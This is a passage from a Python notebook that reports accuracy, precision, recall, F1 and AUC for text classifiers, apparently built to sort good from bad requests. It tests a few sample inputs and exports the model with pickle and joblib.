/usr/local/lib/python3.6/dist-packages/sklearn/linear_model/_logistic.py:940: ConvergenceWarning: lbfgs failed to converge (status=1):
STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression


========== Params - ngram: (1, 3), max_features: 50000, regularization: 10000.0
... TfidfVectorizer:
Accuracy: 0.992989
Precision: 0.990467
Recall: 0.999030
F1-Score: 0.994730
AUC: 0.999680
... CountVectorizer:
Accuracy: 0.998978
Precision: 0.999224
Recall: 0.999321
F1-Score: 0.999273
AUC: 0.999884
... SGDClassifier: 
accuracy: 0.9950920245398773


In [ ]:
mdl_sgd.score(trn_term_doc, trn_y)

0.9928423266820532

In [ ]:
pr = c_ctrz.transform(['@die'])
mdl_c.predict(pr)

array([ True])

# 8 Export model

## 8.1 Pickle

In [ ]:
import pickle

model_mypath = 'drive/My Drive/Colab Notebooks/AIacademy/class-C/project/model.pkl'
with open(model_mypath, 'wb') as f:
    pickle.dump(final_model, f)

## 8.2 Joblib

In [ ]:
final_model = tf_m.fit(X, y)

NameError: ignored

In [ ]:
pipeline = Pipeline(steps= [('tfidf', TfidfVectorizer(ngram_range=(1,3),
                                                      min_df=0.0, 
                                                      analyzer='word', 
                                                      sublinear_tf=True)),
                            ('model', LogisticRegression(C=1e8))])
                                # class_weight={1: 2 * len(good_requests) / len(bad_requests), 0: 1.0}))])

In [ ]:
pipeline.fit(x, y)

Pipeline(memory=None,
         steps=[('tfidf',
                 TfidfVectorizer(analyzer='word', binary=False,
                                 decode_error='strict',
                                 dtype=<class 'numpy.float64'>,
                                 encoding='utf-8', input='content',
                                 lowercase=True, max_df=1.0, max_features=None,
                                 min_df=0.0, ngram_range=(1, 3), norm='l2',
                                 preprocessor=None, smooth_idf=True,
                                 stop_words=None, strip_accents=None,
                                 sublinear_tf=True,
                                 token_pattern='(?u)\\b\\w\\w+\\b',
                                 tokenizer=None, use_idf=True,
                                 vocabulary=None)),
                ('model',
                 LogisticRegression(C=100000000.0, class_weight=None,
                                    dual=False, fit_intercept=True,
      

In [ ]:
pipeline.predict(['home'])

array([ True])

In [ ]:
from joblib import dump
# dump the pipeline model
dump(pipeline, filename="drive/My Drive/Colab Notebooks/AIacademy/class-C/project/model_pipe.joblib")

['drive/My Drive/Colab Notebooks/AIacademy/class-C/project/model_pipe.joblib']